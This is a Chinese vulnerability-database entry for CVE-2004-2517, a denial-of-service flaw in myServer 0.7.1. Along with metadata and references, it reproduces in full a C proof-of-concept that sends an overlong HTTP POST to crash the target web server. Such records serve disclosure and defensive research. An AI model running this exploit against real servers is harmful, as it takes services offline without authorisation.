myServer服务拒绝(崩溃)漏洞

myServer服务拒绝(崩溃)漏洞

漏洞ID 1108197 漏洞类型 未知
发布时间 2004-09-27 更新时间 2004-12-31
图片[1]-myServer服务拒绝(崩溃)漏洞-安全小百科CVE编号 CVE-2004-2517
图片[2]-myServer服务拒绝(崩溃)漏洞-安全小百科CNNVD-ID CNNVD-200412-1035
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/551
https://www.securityfocus.com/bid/90356
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1035
|漏洞详情
myServer0.7.1版本存在漏洞。远程攻击者借助到index.html的View=Logon操作中的超长HTTPPOST请求导致服务拒绝(崩溃)。
|漏洞EXP
/****************************/ 
PoC to crash the server 
/****************************/ 

/* MyServer 0.7.1 POST Denial Of Service 
vendor URL: 
http://www.myserverproject.net 

coded and discovered by: 
badpack3t 
for .:sp research labs:. 
www.security-protocols.com 
9.20.2004 
Tested on Mandrake 10.0 

usage: 
sp-myserv-0.7.1 [targetport] (default is 80) 
*/ 

#include <'winsock2.h> 
#include <'stdio.h> 

#pragma comment(lib, "ws2_32.lib") 

char exploit[] = 

"POST index.html?View=Logon HTTP/1.1 " 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" 
": ihack.ms "; 

int main(int argc, char *argv[]) 
{ 
WSADATA wsaData; 
WORD wVersionRequested; 
struct hostent *pTarget; 
struct sockaddr_in sock; 
char *target; 
int port,bufsize; 
SOCKET mysocket; 

if (argc < 2) 
{ 
printf("MyServer 0.7.1 POST DoS by badpack3t ", argv[0]); 
printf("Usage: %s [targetport] (default is 80) ", argv[0]); 
printf("www.security-protocols.com ", argv[0]); 
exit(1); 
} 

wVersionRequested = MAKEWORD(1, 1); 
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; 

target = argv[1]; 
port = 80; 

if (argc >= 3) port = atoi(argv[2]); 
bufsize = 1024; 
if (argc >= 4) bufsize = atoi(argv[3]); 

mysocket = socket(AF_INET, SOCK_STREAM, 0); 
if(mysocket==INVALID_SOCKET) 
{ 
printf("Socket error! "); 
exit(1); 
} 

printf("Resolving Hostnames... "); 
if ((pTarget = gethostbyname(target)) == NULL) 
{ 
printf("Resolve of %s failed ", argv[1]); 
exit(1); 
} 

memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); 
sock.sin_family = AF_INET; 
sock.sin_port = htons((USHORT)port); 

printf("Connecting... "); 
if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))) 
{ 
printf("Couldn't connect to host. "); 
exit(1); 
} 

printf("Connected!... "); 
printf("Sending Payload... "); 
if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1) 
{ 
printf("Error Sending the Exploit Payload "); 
closesocket(mysocket); 
exit(1); 
} 

printf("Payload has been sent! Check if the webserver is dead! "); 
closesocket(mysocket); 
WSACleanup(); 
return 0; 
}

// milw0rm.com [2004-09-27]
|受影响的产品
myServer myServer 0.0.13
|参考资料

来源:XF
名称:myserver-http-post-dos(17496)
链接:http://xforce.iss.net/xforce/xfdb/17496
来源:OSVDB
名称:10333
链接:http://www.osvdb.org/10333
来源:SECTRACK
名称:1011427
链接:http://securitytracker.com/id?1011427
来源:SECUNIA
名称:12640
链接:http://secunia.com/advisories/12640
来源:fux0r.phathookups.com
链接:http://fux0r.phathookups.com/advisory/sp-x14-advisory.txt
来源:sourceforge.net
链接:http://sourceforge.net/project/shownotes.php?release_id=270736

相关推荐: Michael Lamont Savant Web Server 3.0 – Denial of Service

Michael Lamont Savant Web Server 3.0 – Denial of Service 漏洞ID 1053523 漏洞类型 发布时间 2001-03-09 更新时间 2001-03-09 CVE编号 N/A CNNVD-ID N/A …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享